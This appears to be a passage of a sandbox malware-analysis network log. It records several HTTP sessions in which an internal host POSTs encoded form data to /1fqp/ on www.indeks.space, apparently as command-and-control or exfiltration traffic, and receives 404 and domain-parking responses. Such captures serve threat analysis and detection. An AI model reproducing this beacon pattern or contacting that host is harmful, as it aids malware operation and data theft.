Aug 27, 2024 17:51:00.948842049 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.11.20	49869	194.58.112.174	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:03.475140095 CEST	1128	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 73 53 44 37 64 47 75 78 74 77 61 32 51 66 68 6f 76 4d 64 5a 36 55 37 34 54 58 6b 45 71 79 47 66 73 36 33 4a 69 48 67 38 51 79 59 50 70 44 5a 72 4c 47 48 63 46 74 61 6f 46 72 42 56 79 59 59 43 46 55 62 4d 2f 66 49 75 63 34 48 6e 79 42 74 62 4d 31 55 50 48 62 7a 61 74 41 38 43 46 76 64 68 53 4f 57 74 2b 76 4b 50 41 63 4e 35 45 69 54 62 32 64 59 61 73 5a 30 67 50 54 2f 6b 37 73 30 79 37 65 6d 77 76 43 72 4f 54 56 38 74 32 33 71 6a 53 4f 46 6f 31 78 75 52 53 65 67 55 77 5a 33 67 6d 44 6a 4b 49 6e 70 78 77 70 2b 31 56 56 44 68 67 31 56 76 4f 48 37 49 4b 4c 4d 78 37 6f 6a 5a 61 39 37 36 47 44 75 76 38 51 47 72 77 62 2f 34 41 54 54 71 42 43 36 65 48 47 6f 37 49 39 65 43 45 43 41 51 30 50 67 47 78 55 72 6d 59 49 42 2b 54 63 4a 37 66 5a 57 56 44 41 66 36 55 6b 54 2b 67 6d 6b 74 4f 31 66 55 62 59 76 74 54 70 38 2f 43 4a 2b 64 71 57 4d 59 4c 43 4e 5a 6f 32 77 4d [TRUNCATED] Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXsSD7dGuxtwa2QfhovMdZ6U74TXkEqyGfs63JiHg8QyYPpDZrLGHcFtaoFrBVyYYCFUbM/fIuc4HnyBtbM1UPHbzatA8CFvdhSOWt+vKPAcN5EiTb2dYasZ0gPT/k7s0y7emwvCrOTV8t23qjSOFo1xuRSegUwZ3gmDjKInpxwp+1VVDhg1VvOH7IKLMx7ojZa976GDuv8QGrwb/4ATTqBC6eHGo7I9eCECAQ0PgGxUrmYIB+TcJ7fZWVDAf6UkT+gmktO1fUbYvtTp8/CJ+dqWMYLCNZo2wMc0qqfR+UKJKo36oXX/X0haHjjABidlbfoN0JpL8RHFoC0gu99YXJW8g61el0i8Uad6ad8SIpABisbTUkmIDbWixdPPqlhcaI43HD1huE0SnWmwMHZFvjesFTF2cLgNl9p0m+hCmuCB/0tRa9fn9WwXkpycoL1Hq6OsUeG1alKpfCHzRxCeARe3Yl57WQJSnYpBN02DLQH4akEc=
Aug 27, 2024 17:51:03.700158119 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:51:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:51:03.700210094 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
Aug 27, 2024 17:51:03.700278997 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.11.20	49870	194.58.112.174	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:06.241034031 CEST	6445	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 71 4b 44 37 50 4f 75 2b 71 45 61 31 51 66 68 6c 50 4d 63 5a 36 56 70 34 54 76 6f 45 71 2b 73 66 76 43 33 4a 7a 58 67 39 6c 75 59 61 5a 44 63 31 37 47 46 59 46 74 4f 6f 46 75 62 56 79 64 6a 43 55 51 62 4e 34 6a 49 35 50 51 47 72 43 42 52 62 4d 31 41 46 6e 62 37 61 74 4d 73 43 41 33 64 68 58 57 57 74 4e 58 4b 44 7a 6b 4e 6d 30 69 51 52 57 64 48 50 63 5a 4e 67 50 32 47 6b 37 73 6b 79 36 4b 6d 77 74 4b 72 50 56 64 2f 73 57 33 71 38 69 4f 47 73 31 39 79 52 55 37 2f 55 77 74 33 67 68 2f 6a 4c 6f 6e 70 33 52 70 39 78 31 56 4e 6c 67 30 50 6c 75 37 7a 49 4c 76 79 78 2b 59 6a 65 71 70 37 35 52 76 75 69 35 6b 47 77 77 62 78 38 41 53 66 67 68 43 6d 65 44 62 42 37 4c 6b 6c 43 44 43 41 52 55 76 67 54 67 56 39 77 6f 49 44 37 54 64 44 2f 66 46 61 56 44 51 44 36 55 6b 44 2b 68 69 6b 74 64 74 66 56 66 30 75 75 44 70 2f 79 69 4a 76 55 4b 53 4b 59 4c 4f 57 5a 6f 75 61 4d [TRUNCATED] Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXqKD7POu+qEa1QfhlPMcZ6Vp4TvoEq+sfvC3JzXg9luYaZDc17GFYFtOoFubVydjCUQbN4jI5PQGrCBRbM1AFnb7atMsCA3dhXWWtNXKDzkNm0iQRWdHPcZNgP2Gk7sky6KmwtKrPVd/sW3q8iOGs19yRU7/Uwt3gh/jLonp3Rp9x1VNlg0Plu7zILvyx+Yjeqp75Rvui5kGwwbx8ASfghCmeDbB7LklCDCARUvgTgV9woID7TdD/fFaVDQD6UkD+hiktdtfVf0uuDp/yiJvUKSKYLOWZouaMaUqr/R+E9dJmH6va3/BpxaQjjMrichteZh0LZb8VXFnUkgymNYZfm8g6yWX0iwUbvqaP/KI/nViubTWkmIobWuSdPHAlkUwI6bHEnJuHxygAGwzQJFGnehFTDSqLgcH9eEm9gymqCB+i9QS1/mmBhr4pyBdL1zD6J4USgsl/KZaYmWZ1zm3Xvn3jrDrX66IQeZA8nffNlAB5TrwUWjmtefVDCV9a9uoeN+XbaNcMS0UhKOLi8R/O4bVagcVwksQSNZCTUOYXGD8ba5l2PfO8JCWtpm9hMUnj4K4KyoNYD/qItcxJOgILnvzEzRvGw4wVw22Q+BAembw9c1lLxvUn0Sc80ZenLc8VheuBs9mdgKfLE8qZCuisf82k//gg9gebDIRckqKsv18w4bIAsUvGFHEbd9iFnr64hE8TCRr2wm8Gz/XTTobrJ/dnZpR69aKHuRx1nPwMIjUFOT0t02VjnicObBXX+SGfpTGQ2gv+jw+dL2TfYneAVgJb8cOvhPU0eiYE0fAQbvGIGH5ZaBI/KVsXZJIUEAQcpzARhiKMInrLtoI1zF+w0YYHV3gEy6p6GscgLLpiOz8SIVvhAACgCGSG1tAeDtMyz3YNx10vbe1novqjeASDPL5QxfjCUvMtjpxWq5MqIY4oxwpFjuv42V8wygCUrDRIpd [TRUNCATED]
Aug 27, 2024 17:51:06.465759993 CEST	1289	OUT	Data Raw: 52 35 68 43 51 45 2b 53 43 37 67 6b 2f 52 68 4a 58 56 34 44 35 66 78 4f 48 6c 36 63 59 6e 30 59 4a 4b 6d 76 77 42 47 45 59 65 5a 72 4b 53 79 38 51 48 65 59 32 77 2b 72 56 6a 51 63 46 45 71 51 78 6a 43 41 50 32 36 42 66 36 2b 65 36 6e 47 63 36 59 Data Ascii: R5hCQE+SC7gk/RhJXV4D5fxOHl6cYn0YJKmvwBGEYeZrKSy8QHeY2w+rVjQcFEqQxjCAP26Bf6+e6nGc6YQeuvQvMdg7aSiTSZJ97iOURgnkMLZu4OHiL1DKjObSK8Wu6Bmgttchwkm3lrvVj7sR9yXF1ZJFC1JoWEd3kb1VyBApCgL+cE6hyeFVnEuqLZhz5+OVW0D2ZoneEBpa18mKEfoQG+MpW73eeuQ9d3rIaX5FVAkfT16
Aug 27, 2024 17:51:06.465806007 CEST	1289	OUT	Data Raw: 63 74 4a 6c 4d 49 63 72 48 53 6d 65 45 55 6b 54 4d 31 4d 74 4b 77 33 73 78 47 6e 76 4c 50 37 72 33 32 6f 6d 36 79 73 74 67 56 65 53 67 48 72 6a 70 35 48 5a 57 6e 6a 64 62 36 53 43 6a 52 63 6c 71 5a 39 67 45 55 77 54 72 4d 59 52 4b 71 56 4d 4f 4c Data Ascii: ctJlMIcrHSmeEUkTM1MtKw3sxGnvLP7r32om6ystgVeSgHrjp5HZWnjdb6SCjRclqZ9gEUwTrMYRKqVMOLf6WgUlw/LL5W6HHbETSOOwXQUDbiLhBJbUf1VCiOyOvmmQdxWPB4ODTFPX9bxOLQ9ZQL+sE6oJL6Aq9j3QwPeEL4Inq6fQd9lkq58nr+6A0rhguoWk7v0RDAXTRMrboGEZ9VuJqCFRacK+dfccmLP5Gx0Twgv354m
Aug 27, 2024 17:51:06.465842962 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:51:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:51:06.465926886 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
Aug 27, 2024 17:51:06.466023922 CEST	1239	IN	Data Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1 Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~\|I\|}Jy\M:WlN?
Aug 27, 2024 17:51:06.466402054 CEST	2578	OUT	Data Raw: 62 51 33 46 4e 6e 73 5a 4c 47 2f 56 2b 45 51 6a 65 67 44 6f 6f 36 4a 7a 74 56 72 57 4a 5a 2b 62 73 73 65 49 64 32 70 33 43 76 73 53 4f 42 65 38 63 47 54 44 4b 39 68 4d 45 41 4a 6a 6e 6e 46 58 6f 70 67 4f 33 4f 4b 35 47 73 62 79 57 6c 6a 4d 53 34 Data Ascii: bQ3FNnsZLG/V+EQjegDoo6JztVrWJZ+bsseId2p3CvsSOBe8cGTDK9hMEAJjnnFXopgO3OK5GsbyWljMS4cHf57ccbidNQASCGdHpiUPb9INJ3grEItwTAEyQeHkqe0hjfYUD6bmtzADwArryTU+/wdxRV9mHnAqHdqS9cAfYrXJY1+b9zmHf1C9B9fY3ZJtqjrRlvrJgtBvH/XefHauG+hR8wCvJ/+VnqeNGWjIqDWhYDtWe/F
Aug 27, 2024 17:51:06.466448069 CEST	1289	OUT	Data Raw: 6f 31 6d 52 51 57 61 4e 6c 49 47 76 6b 2f 33 7a 51 65 46 74 41 52 47 2f 68 6d 39 72 36 31 41 69 67 30 2b 48 45 56 76 4c 66 77 76 74 64 76 6e 65 47 59 34 6c 2b 37 47 63 4a 6c 59 2f 6a 37 70 36 51 79 71 68 72 58 31 54 74 48 7a 4d 6e 4e 77 70 6f 65 Data Ascii: o1mRQWaNlIGvk/3zQeFtARG/hm9r61Aig0+HEVvLfwvtdvneGY4l+7GcJlY/j7p6QyqhrX1TtHzMnNwpoeVlF2bEpSKTMHYWJyQAvRFaQMFlZEd2/J7nYcnuEQ0h/11gD3rNADSKZ68sHd8YV92nJsfbZtNDm0/uqM1okfF1DAVBW+xRa5hT1vFc0tBLidevFqFKXrVTgVA/wF1hIEXNUZI5sf/AxA+A1LXzk+XM/PZnKTYxDaX
Aug 27, 2024 17:51:06.689901114 CEST	1289	OUT	Data Raw: 37 4d 58 34 6f 74 73 79 57 64 2f 4b 74 33 70 2b 46 35 66 76 43 34 36 41 34 4b 4e 6b 47 69 4c 41 41 30 62 79 6d 57 79 64 50 65 70 4c 42 64 70 69 65 58 4d 55 30 64 39 6f 52 5a 44 53 54 6a 41 57 68 44 73 59 49 51 7a 4d 50 66 37 76 35 36 65 6c 65 43 Data Ascii: 7MX4otsyWd/Kt3p+F5fvC46A4KNkGiLAA0bymWydPepLBdpieXMU0d9oRZDSTjAWhDsYIQzMPf7v56eleCN/IZUBvjfaYkAtCGgngdkSHUqXgD+dxvFTNewykATdRLYYsCaoNKntTuKYZIkAustXJfOtJfM13tDLLMO+nSTscYmaMrzp0N1JF61LmXmeYtLoUyYNhegPJhUeEpOqx/lmjGVbhGs5ZYZRvbAezo+0Amk6dWdiyhW
Aug 27, 2024 17:51:06.689949036 CEST	1289	OUT	Data Raw: 2f 63 51 4a 66 4a 62 71 6d 71 54 30 50 55 7a 4d 6f 45 4b 38 69 75 54 46 5a 41 4f 49 4e 6b 4b 4d 43 49 68 37 37 7a 5a 50 6d 72 4e 43 49 4b 5a 72 57 4f 36 42 56 32 49 32 68 32 46 68 55 34 56 30 4d 45 53 50 4b 52 55 68 42 53 47 54 51 56 72 5a 69 53 Data Ascii: /cQJfJbqmqT0PUzMoEK8iuTFZAOINkKMCIh77zZPmrNCIKZrWO6BV2I2h2FhU4V0MESPKRUhBSGTQVrZiS6aAwowurX8k/T6zJYJaGofwxc0C2oJ4f20OYYoJdhO9YvEFexaQGndSJeM1kuluxn76hZVthkg89d+Ee4x5qDAvTk/TuNCF1XsrYTdqnuSox/bnSbczPU2MQ5op2tLrfYl7+vLOhw/gG1k/EWnez6ShcRQs0FrsBl
Aug 27, 2024 17:51:06.690771103 CEST	1289	OUT	Data Raw: 69 72 31 51 79 4d 36 49 34 67 47 61 54 4d 6a 58 59 4d 44 64 49 7a 75 76 48 42 63 37 4a 63 6f 76 63 41 38 6d 63 62 67 59 6c 43 7a 73 66 78 68 64 6c 30 44 35 31 53 6e 48 37 4d 35 76 48 55 4e 49 66 69 75 58 55 2f 6f 37 30 7a 67 4e 72 4e 49 6c 2f 52 Data Ascii: ir1QyM6I4gGaTMjXYMDdIzuvHBc7JcovcA8mcbgYlCzsfxhdl0D51SnH7M5vHUNIfiuXU/o70zgNrNIl/RNKOHwopRE0ygdUUOCTFcg7YAORoHYyYJJ/Kk/xfCzkJ5F9FGfRw5i2kR+no2oqIfKofbndnCtBCs8XNnUeyxFqhsOl3B/GvvkkVXpMq7Pw4KdsxVFLUyTv2xEhYhWibBPo1A2cmD5fgvIcsV8fwCOL/TLyeZu0AbN
Aug 27, 2024 17:51:06.690819979 CEST	1289	OUT	Data Raw: 43 32 52 36 33 56 74 54 51 6a 62 33 47 31 43 33 43 46 6c 69 33 71 4d 69 4e 6a 78 73 36 61 4d 56 57 6e 59 6e 46 55 48 38 34 71 72 34 62 42 43 55 30 2f 68 75 35 47 73 45 35 74 4a 71 6b 62 6b 71 42 52 48 76 62 5a 49 52 30 48 5a 65 67 31 55 4c 32 48 Data Ascii: C2R63VtTQjb3G1C3CFli3qMiNjxs6aMVWnYnFUH84qr4bBCU0/hu5GsE5tJqkbkqBRHvbZIR0HZeg1UL2HS8YgzgEFSxuAWHz/lnMRUTWgDvp+8yo+VmqP9aI7CcINQ9QXtnzMkm/elcEptlm+v0yQ35VUe2rgv4eIZhvg0w7lB0nULLkneS9DKGY1oD52FheKipO6wNLaJTNVZT154mg369bu8fqGDpjK9XwN/B+p8mTIUKmT+

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.11.20	49871	194.58.112.174	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:09.005251884 CEST	525	OUT	GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.indeks.space Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:51:09.232232094 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:51:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 [TRUNCATED] Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.indeks.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" [TRUNCATED]
Aug 27, 2024 17:51:09.232717991 CEST	1289	IN	Data Raw: 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 Data Ascii: pper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.indeks.space</h1><p class="b-parking__header-description b-text">
Aug 27, 2024 17:51:09.232826948 CEST	1289	IN	Data Raw: 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f Data Ascii: type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></stro
Aug 27, 2024 17:51:09.233078957 CEST	1289	IN	Data Raw: 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f Data Ascii: g__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&reg_source=parking_auto"> </a><p class="b-price b-parking__pric
Aug 27, 2024 17:51:09.233829021 CEST	1289	IN	Data Raw: d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf Data Ascii:  CMS</strong><p class="b-text b-parking__promo-description">  CMS
